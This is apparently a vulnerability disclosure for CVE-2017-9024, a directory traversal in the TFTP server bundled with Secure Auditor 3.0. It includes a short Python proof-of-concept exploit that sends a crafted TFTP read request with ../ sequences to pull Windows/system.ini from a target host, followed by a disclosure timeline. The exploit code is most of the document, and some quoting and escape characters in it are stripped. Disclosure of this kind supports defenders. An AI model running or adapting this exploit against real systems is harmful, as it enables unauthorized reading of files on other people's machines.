CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal

[+] Credits: John Page aka HYP3RLINX	
[+] Website:
[+] Source:
[+] ISR: ApparitionSec            


Secure Auditor - v3.0

Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.

Vulnerability Type:
Directory Traversal

CVE Reference:

Security Issue:
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.

import sys,socket

print Secure Auditor v3.0 / Cisco Config Manager
print TFTP Directory Traversal Exploit
print Read ../../../../Windows/system.ini POC
print hyp3rlinx

HOST = raw_input("[IP]> ")
FILE = ../../../../Windows/system.ini 
PORT = 69                                        
PAYLOAD = "x00x01"                #TFTP Read 
PAYLOAD += FILE+"x00"              #Read system.ini using directory traversal
PAYLOAD += "netasciix00"           #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)

print "Victim Data located on : %s " %(HOST)
print out.strip()

Disclosure Timeline:
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure

